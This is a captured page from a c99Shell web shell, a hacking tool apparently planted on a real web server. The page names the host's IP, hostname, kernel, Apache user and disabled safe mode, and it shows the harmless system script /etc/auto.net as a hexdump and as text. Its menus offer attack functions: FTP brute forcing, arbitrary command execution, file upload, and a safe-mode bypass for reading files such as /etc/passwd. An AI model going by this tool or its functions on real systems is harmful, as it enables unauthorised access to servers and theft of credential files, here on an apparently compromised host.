110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /etc/ drwxr-xr-x Free 40.47 GB of 127.8 GB (31.66%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/etc/ drwxr-xr-x
Free 40.47 GB of 127.8 GB (31.66%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: auto.net (1.26 KB) -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

Information:

Path	/etc/auto.net
Size	1.26 KB
MD5	1fcd80ceb67bbbacad968bacff10cf98
Owner/Group	root/root
Perms	-rwxr-xr-x
Create time	25/04/2011 18:10:31
Access time	05/10/2024 13:33:10
MODIFY time	31/03/2010 21:39:11

FULL HEXDUMP

00000000
00000018
00000030
00000048
00000060
00000078
00000090
000000A8
000000C0
000000D8
000000F0
00000108
00000120
00000138
00000150
00000168
00000180
00000198
000001B0
000001C8
000001E0
000001F8
00000210
00000228
00000240
00000258
00000270
00000288
000002A0
000002B8
000002D0
000002E8
00000300
00000318
00000330
00000348
00000360
00000378
00000390
000003A8
000003C0
000003D8
000003F0
00000408
00000420
00000438
00000450
00000468
00000480
00000498
000004B0
000004C8
000004E0
000004F8

23 21 2F 62 69 6E 2F 62 61 73 68 0A 0A 23 20 24 49 64 3A 20 61 75 74 6F
2E 6E 65 74 2C 76 20 31 2E 38 20 32 30 30 35 2F 30 34 2F 30 35 20 31 33
3A 30 32 3A 30 39 20 72 61 76 65 6E 20 45 78 70 20 24 0A 0A 23 20 54 68
69 73 20 66 69 6C 65 20 6D 75 73 74 20 62 65 20 65 78 65 63 75 74 61 62
6C 65 20 74 6F 20 77 6F 72 6B 21 20 63 68 6D 6F 64 20 37 35 35 21 0A 0A
23 20 4C 6F 6F 6B 20 61 74 20 77 68 61 74 20 61 20 68 6F 73 74 20 69 73
20 65 78 70 6F 72 74 69 6E 67 20 74 6F 20 64 65 74 65 72 6D 69 6E 65 20
77 68 61 74 20 77 65 20 63 61 6E 20 6D 6F 75 6E 74 2E 0A 23 20 54 68 69
73 20 69 73 20 76 65 72 79 20 73 69 6D 70 6C 65 2C 20 62 75 74 20 69 74
20 61 70 70 65 61 72 73 20 74 6F 20 77 6F 72 6B 20 73 75 72 70 72 69 73
69 6E 67 6C 79 20 77 65 6C 6C 0A 0A 6B 65 79 3D 22 24 31 22 0A 0A 23 20
61 64 64 20 22 6E 6F 73 79 6D 6C 69 6E 6B 22 20 68 65 72 65 20 69 66 20
79 6F 75 20 77 61 6E 74 20 74 6F 20 73 75 70 70 72 65 73 73 20 73 79 6D
6C 69 6E 6B 69 6E 67 20 6C 6F 63 61 6C 20 66 69 6C 65 73 79 73 74 65 6D
73 0A 23 20 61 64 64 20 22 6E 6F 6E 73 74 72 69 63 74 22 20 74 6F 20 6D
61 6B 65 20 69 74 20 4F 4B 20 66 6F 72 20 73 6F 6D 65 20 66 69 6C 65 73
79 73 74 65 6D 73 20 74 6F 20 6E 6F 74 20 6D 6F 75 6E 74 0A 6F 70 74 73
3D 22 2D 66 73 74 79 70 65 3D 6E 66 73 2C 68 61 72 64 2C 69 6E 74 72 2C
6E 6F 64 65 76 2C 6E 6F 73 75 69 64 22 0A 0A 23 20 53 68 6F 77 6D 6F 75
6E 74 20 63 6F 6D 65 73 20 69 6E 20 61 20 6E 75 6D 62 65 72 20 6F 66 20
6E 61 6D 65 73 20 61 6E 64 20 76 61 72 69 65 74 69 65 73 2E 20 20 22 73
68 6F 77 6D 6F 75 6E 74 22 20 69 73 0A 23 20 74 79 70 69 63 61 6C 6C 79
20 61 6E 20 6F 6C 64 65 72 20 76 65 72 73 69 6F 6E 20 77 68 69 63 68 20
61 63 63 65 70 74 73 20 74 68 65 20 27 2D 2D 6E 6F 2D 68 65 61 64 65 72
73 27 20 66 6C 61 67 0A 23 20 62 75 74 20 69 67 6E 6F 72 65 73 20 69 74
2E 20 20 22 6B 73 68 6F 77 6D 6F 75 6E 74 22 20 69 73 20 74 68 65 20 6E
65 77 65 72 20 76 65 72 73 69 6F 6E 20 69 6E 73 74 61 6C 6C 65 64 20 77
69 74 68 20 6B 6E 66 73 64 2C 0A 23 20 77 68 69 63 68 20 62 6F 74 68 20
61 63 63 65 70 74 73 20 61 6E 64 20 61 63 74 73 20 6F 6E 20 74 68 65 20
27 2D 2D 6E 6F 2D 68 65 61 64 65 72 73 27 20 66 6C 61 67 2E 0A 23 53 48
4F 57 4D 4F 55 4E 54 3D 22 6B 73 68 6F 77 6D 6F 75 6E 74 20 2D 2D 6E 6F
2D 68 65 61 64 65 72 73 20 2D 65 20 24 6B 65 79 22 0A 23 53 48 4F 57 4D
4F 55 4E 54 3D 22 73 68 6F 77 6D 6F 75 6E 74 20 2D 65 20 24 6B 65 79 20
7C 20 74 61 69 6C 20 2D 6E 20 2B 32 22 0A 0A 66 6F 72 20 50 20 69 6E 20
2F 62 69 6E 20 2F 73 62 69 6E 20 2F 75 73 72 2F 62 69 6E 20 2F 75 73 72
2F 73 62 69 6E 0A 64 6F 0A 09 66 6F 72 20 4D 20 69 6E 20 73 68 6F 77 6D
6F 75 6E 74 20 6B 73 68 6F 77 6D 6F 75 6E 74 0A 09 64 6F 0A 09 09 69 66
20 5B 20 2D 78 20 24 50 2F 24 4D 20 5D 0A 09 09 74 68 65 6E 0A 09 09 09
53 4D 4E 54 3D 24 50 2F 24 4D 0A 09 09 09 62 72 65 61 6B 0A 09 09 66 69
0A 09 64 6F 6E 65 0A 64 6F 6E 65 0A 0A 5B 20 2D 78 20 24 53 4D 4E 54 20
5D 20 7C 7C 20 65 78 69 74 20 31 0A 0A 23 20 4E 65 77 65 72 20 64 69 73
74 72 69 62 75 74 69 6F 6E 73 20 67 65 74 20 74 68 69 73 20 72 69 67 68
74 0A 53 48 4F 57 4D 4F 55 4E 54 3D 22 24 53 4D 4E 54 20 2D 2D 6E 6F 2D
68 65 61 64 65 72 73 20 2D 65 20 24 6B 65 79 22 0A 0A 24 53 48 4F 57 4D
4F 55 4E 54 20 7C 20 4C 43 5F 41 4C 4C 3D 43 20 73 6F 72 74 20 2D 6B 20
31 20 7C 20 5C 0A 09 61 77 6B 20 2D 76 20 6B 65 79 3D 22 24 6B 65 79 22
20 2D 76 20 6F 70 74 73 3D 22 24 6F 70 74 73 22 20 2D 2D 20 27 0A 09 42
45 47 49 4E 09 7B 20 4F 52 53 3D 22 22 3B 20 66 69 72 73 74 3D 31 20 7D
0A 09 09 7B 20 69 66 20 28 66 69 72 73 74 29 20 7B 20 70 72 69 6E 74 20
6F 70 74 73 3B 20 66 69 72 73 74 3D 30 20 7D 3B 20 70 72 69 6E 74 20 22
20 5C 5C 5C 6E 5C 74 22 20 24 31 2C 20 6B 65 79 20 22 3A 22 20 24 31 20
7D 0A 09 45 4E 44 09 7B 20 69 66 20 28 21 66 69 72 73 74 29 20 70 72 69
6E 74 20 22 5C 6E 22 3B 20 65 6C 73 65 20 65 78 69 74 20 31 20 7D 0A 09
27 20 7C 20 73 65 64 20 27 73 2F 23 2F 5C 5C 23 2F 67 27 0A

#!/bin/bash  # $Id: auto
.net,v 1.8 2005/04/05 13
:02:09 raven Exp $  # Th
is file must be executab
le to work! chmod 755!
# Look at what a host is
exporting to determine
what we can mount. # Thi
s is very simple, but it
appears to work surpris
ingly well  key="$1"  #
add "nosymlink" here if
you want to suppress sym
linking local filesystem
s # add "nonstrict" to m
ake it OK for some files
ystems to not mount opts
="-fstype=nfs,hard,intr,
nodev,nosuid"  # Showmou
nt comes in a number of
names and varieties.  "s
howmount" is # typically
an older version which
accepts the '--no-header
s' flag # but ignores it
.  "kshowmount" is the n
ewer version installed w
ith knfsd, # which both
accepts and acts on the
'--no-headers' flag. #SH
OWMOUNT="kshowmount --no
-headers -e $key" #SHOWM
OUNT="showmount -e $key
| tail -n +2"  for P in
/bin /sbin /usr/bin /usr
/sbin do for M in showm
ount kshowmount do if
[ -x $P/$M ] then
SMNT=$P/$M break fi
done done  [ -x $SMNT
] || exit 1  # Newer dis
tributions get this righ
t SHOWMOUNT="$SMNT --no-
headers -e $key"  $SHOWM
OUNT | LC_ALL=C sort -k
1 | \ awk -v key="$key"
-v opts="$opts" -- ' B
EGIN { ORS=""; first=1 }
{ if (first) { print
opts; first=0 }; print "
\\\n\t" $1, key ":" $1
} END { if (!first) pri
nt "\n"; else exit 1 }
' | sed 's/#/\\#/g'

HEXDUMP: [Full] [Preview]
Base64: [Encode] [+chunk] [+chunk+quotes] [Decode]

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0093 ]--